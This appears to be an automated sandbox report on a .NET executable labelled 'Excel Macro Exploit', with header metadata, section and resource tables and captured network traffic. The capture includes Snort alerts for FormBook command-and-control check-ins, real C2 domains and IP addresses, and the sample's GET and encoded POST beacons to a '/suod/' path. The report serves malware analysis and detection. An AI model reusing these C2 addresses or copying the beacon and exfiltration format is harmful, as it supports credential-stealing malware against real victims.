                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                              Time Stamp:0x607421F5 [Mon Apr 12 10:33:25 2021 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:v4.0.30319
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              jmp dword ptr [00402000h]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x7d1e80x57.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x7e0000x383d8.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xb80000xc.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x20000x7b2480x7b400False0.976667485421data7.9825675946IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0x7e0000x383d80x38400False0.171124131944data3.98776782923IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0xb80000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                              RT_ICON0x7e5500x330data
                                                                                                              RT_ICON0x7e8800x130data
                                                                                                              RT_ICON0x7e9b00xb0GLS_BINARY_LSB_FIRST
                                                                                                              RT_ICON0x7ea600x298fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                              RT_ICON0x813f00x668data
                                                                                                              RT_ICON0x81a580x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 1, next used block 131072
                                                                                                              RT_ICON0x81d400x1e8data
                                                                                                              RT_ICON0x81f280x128GLS_BINARY_LSB_FIRST
                                                                                                              RT_ICON0x820500x24aaPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                              RT_ICON0x844fc0xea8data
                                                                                                              RT_ICON0x853a40x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                                                                                              RT_ICON0x85c4c0x6c8data
                                                                                                              RT_ICON0x863140x568GLS_BINARY_LSB_FIRST
                                                                                                              RT_ICON0x8687c0x154ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                              RT_ICON0x87dcc0x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                                                              RT_ICON0x985f40x94a8data
                                                                                                              RT_ICON0xa1a9c0x67e8data
                                                                                                              RT_ICON0xa82840x5488data
                                                                                                              RT_ICON0xad70c0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                                                                                              RT_ICON0xb19340x25a8data
                                                                                                              RT_ICON0xb3edc0x10a8data
                                                                                                              RT_ICON0xb4f840x988data
                                                                                                              RT_ICON0xb590c0x468GLS_BINARY_LSB_FIRST
                                                                                                              RT_GROUP_ICON0xb5d740x148data
                                                                                                              RT_VERSION0xb5ebc0x368data
                                                                                                              RT_MANIFEST0xb62240x1b4XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              mscoree.dll_CorExeMain

                                                                                                              Version Infos

                                                                                                              DescriptionData
                                                                                                              Translation0x0000 0x04b0
                                                                                                              LegalCopyrightCopyright 2020
                                                                                                              Assembly Version1.0.0.0
                                                                                                              InternalNameBogxyjdq.exe
                                                                                                              FileVersion1.0.0.0
                                                                                                              CompanyName
                                                                                                              LegalTrademarks
                                                                                                              CommentsExcel Macro Exploit
                                                                                                              ProductNameExcel Macro Exploit
                                                                                                              ProductVersion1.0.0.0
                                                                                                              FileDescriptionExcel Macro Exploit
                                                                                                              OriginalFilenameBogxyjdq.exe

                                                                                                              Network Behavior

                                                                                                              Snort IDS Alerts

                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                              04/12/21-14:41:17.437400TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.3185.53.179.90
                                                                                                              04/12/21-14:41:17.437400TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.3185.53.179.90
                                                                                                              04/12/21-14:41:17.437400TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.3185.53.179.90
                                                                                                              04/12/21-14:41:17.477701TCP1201ATTACK-RESPONSES 403 Forbidden8049737185.53.179.90192.168.2.3

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Apr 12, 2021 14:41:17.356563091 CEST4973780192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:17.396826982 CEST8049737185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:17.396898031 CEST4973780192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:17.437271118 CEST8049737185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:17.437400103 CEST4973780192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:17.477632046 CEST8049737185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:17.477700949 CEST8049737185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:17.477734089 CEST8049737185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:17.477854013 CEST4973780192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:17.477969885 CEST4973780192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:17.518225908 CEST8049737185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.523098946 CEST4973880192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.563442945 CEST8049738185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.563633919 CEST4973880192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.565989017 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.604024887 CEST8049738185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.604176998 CEST4973880192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.606239080 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.606383085 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.644674063 CEST8049738185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.644695044 CEST8049738185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.644995928 CEST4973880192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.649164915 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.649346113 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.690356016 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.690514088 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.690524101 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.690650940 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.731153011 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.731177092 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.731285095 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.731406927 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.731496096 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.731645107 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.731820107 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.731823921 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.731931925 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.772171974 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.772270918 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.772305965 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.772356033 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.772377968 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.772433996 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.772461891 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.772605896 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.772628069 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.772783995 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.772921085 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.773015976 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.812920094 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.813088894 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.813091993 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.813298941 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.813304901 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.813344955 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.813507080 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.814652920 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.814677000 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.814692974 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.853662968 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.853730917 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.854041100 CEST8049739185.53.179.90192.168.2.3

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Apr 12, 2021 14:39:11.522140026 CEST5864353192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:39:11.573681116 CEST53586438.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:39:13.118973970 CEST6098553192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:39:13.170587063 CEST53609858.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:39:14.662055016 CEST5020053192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:39:14.720777035 CEST53502008.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:39:15.330696106 CEST5128153192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:39:15.379388094 CEST53512818.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:39:16.691813946 CEST4919953192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:39:16.742525101 CEST53491998.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:39:47.170037985 CEST5062053192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:39:47.228601933 CEST53506208.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:39:49.740212917 CEST6493853192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:39:49.791822910 CEST53649388.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:39:51.337075949 CEST6015253192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:39:51.394336939 CEST53601528.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:39:54.179939032 CEST5754453192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:39:54.228910923 CEST53575448.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:39:55.207870007 CEST5598453192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:39:55.259268045 CEST53559848.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:39:56.126090050 CEST6418553192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:39:56.177630901 CEST53641858.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:40:07.096040964 CEST6511053192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:40:07.170718908 CEST53651108.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:40:10.835999966 CEST5836153192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:40:10.887254000 CEST53583618.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:40:12.124650002 CEST6349253192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:40:12.175537109 CEST53634928.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:40:12.346266031 CEST6083153192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:40:12.406452894 CEST53608318.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:40:14.961433887 CEST6010053192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:40:15.014569044 CEST53601008.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:40:15.905304909 CEST5319553192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:40:15.959038019 CEST53531958.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:40:33.450150967 CEST5014153192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:40:33.514448881 CEST5302353192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:40:33.574999094 CEST53530238.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:40:33.581015110 CEST53501418.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:40:34.473074913 CEST4956353192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:40:34.532983065 CEST53495638.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:40:35.240588903 CEST5135253192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:40:35.305545092 CEST53513528.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:40:35.555968046 CEST5934953192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:40:35.618067980 CEST53593498.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:40:36.168555021 CEST5708453192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:40:36.219218016 CEST53570848.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:40:37.092263937 CEST5882353192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:40:37.213584900 CEST53588238.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:40:38.112802029 CEST5756853192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:40:38.172787905 CEST53575688.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:40:39.078496933 CEST5054053192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:40:39.138374090 CEST53505408.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:40:41.611711979 CEST5436653192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:40:41.668776989 CEST53543668.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:40:44.383086920 CEST5303453192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:40:44.434708118 CEST53530348.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:40:45.186574936 CEST5776253192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:40:45.246881008 CEST53577628.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:40:47.395488024 CEST5543553192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:40:47.445667028 CEST53554358.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:40:55.438410044 CEST5071353192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:40:55.495491982 CEST53507138.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:41:04.724510908 CEST5613253192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:41:04.784730911 CEST53561328.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:41:06.170977116 CEST5898753192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:41:06.236438990 CEST53589878.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:41:17.185008049 CEST5657953192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:41:17.344877958 CEST53565798.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:41:24.052692890 CEST6063353192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:41:24.109646082 CEST53606338.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:41:25.483484983 CEST6129253192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:41:25.536377907 CEST53612928.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:41:26.287527084 CEST6361953192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:41:26.336119890 CEST53636198.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:41:27.190027952 CEST6493853192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:41:27.241585970 CEST53649388.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:41:28.046186924 CEST6194653192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:41:28.095036983 CEST53619468.8.8.8192.168.2.3
                                                                                                              Apr 12, 2021 14:41:37.750791073 CEST6491053192.168.2.38.8.8.8
                                                                                                              Apr 12, 2021 14:41:37.835771084 CEST53649108.8.8.8192.168.2.3

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                              Apr 12, 2021 14:41:17.185008049 CEST192.168.2.38.8.8.80xf110Standard query (0)www.seniorlivingcaelderly.comA (IP address)IN (0x0001)
                                                                                                              Apr 12, 2021 14:41:37.750791073 CEST192.168.2.38.8.8.80x9769Standard query (0)www.soretyje.comA (IP address)IN (0x0001)

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                              Apr 12, 2021 14:41:17.344877958 CEST8.8.8.8192.168.2.30xf110No error (0)www.seniorlivingcaelderly.com185.53.179.90A (IP address)IN (0x0001)
                                                                                                              Apr 12, 2021 14:41:37.835771084 CEST8.8.8.8192.168.2.30x9769No error (0)www.soretyje.com81.17.18.194A (IP address)IN (0x0001)

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • www.seniorlivingcaelderly.com

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              0192.168.2.349737185.53.179.9080C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Apr 12, 2021 14:41:17.437400103 CEST5700OUTGET /suod/?RL0=uVgD4bu0-2R4Or&Sxo=LsHPYRuctkoWulzKyGbvgGfg2m0Ehvoa2gaw5h/iu275rsWI7O6TvqToE0BPOi46d4K3 HTTP/1.1
                                                                                                              Host: www.seniorlivingcaelderly.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Apr 12, 2021 14:41:17.477700949 CEST5701INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx
                                                                                                              Date: Mon, 12 Apr 2021 12:41:17 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 146
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              1192.168.2.349738185.53.179.9080C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Apr 12, 2021 14:41:19.604176998 CEST5702OUTPOST /suod/ HTTP/1.1
                                                                                                              Host: www.seniorlivingcaelderly.com
                                                                                                              Connection: close
                                                                                                              Content-Length: 409
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.seniorlivingcaelderly.com
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.seniorlivingcaelderly.com/suod/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Raw: 53 78 6f 3d 44 4f 4c 31 47 33 75 47 75 6b 51 61 35 53 36 56 69 54 57 6d 39 6a 53 45 32 58 6b 4b 76 38 59 64 69 57 54 74 39 54 48 37 67 6e 4b 39 75 39 7e 52 38 74 28 56 73 4f 71 31 55 47 78 35 47 79 46 56 44 4a 36 39 65 4e 49 55 34 54 4f 73 56 34 36 79 52 6c 35 48 44 6c 41 2d 67 35 59 54 53 35 68 31 30 73 72 77 6b 6f 4e 53 47 76 65 4c 74 54 4a 50 7a 73 4c 78 68 58 6d 67 39 32 5a 69 4d 7a 46 43 42 4f 6a 56 59 4e 48 68 53 31 68 78 30 49 78 47 4b 68 34 42 47 79 35 62 56 34 59 68 66 63 74 50 28 62 7a 62 36 38 43 6c 56 45 4b 33 65 47 33 51 49 46 4a 43 64 70 35 58 45 36 41 70 34 5a 63 68 6b 41 59 5f 57 73 43 79 38 50 4e 67 4b 4e 63 66 6c 6e 6a 6b 53 4d 53 78 6d 58 6a 47 4b 68 4a 4e 61 6a 46 62 72 79 77 5a 48 6a 41 41 31 39 68 45 39 64 57 4a 49 6f 31 6f 4b 63 4b 48 4a 31 41 63 4f 4c 7a 4a 73 7a 62 79 28 72 69 5f 72 4d 64 63 4f 30 5a 49 47 39 42 4a 79 77 43 78 61 32 72 51 42 45 33 5a 46 76 28 38 43 46 41 53 62 33 77 6b 76 63 5a 39 51 6a 63 77 61 6a 4c 48 32 4a 70 45 67 59 56 65 77 30 74 61 30 7a 74 30 77 70 53 4d 68 61 48 49 71 41 35 4a 75 7a 76 70 54 75 72 2d 65 78 4e 69 36 6d 58 44 5a 34 47 6d 52 62 72 39 65 66 52 63 70 42 46 5f 48 73 6a 67 7e 54 46 5f 61 4d 44 30 68 71 44 35 58 77 38 6e 71 42 37 69 56 41 29 2e 00 00 00 00 00 00 00 00
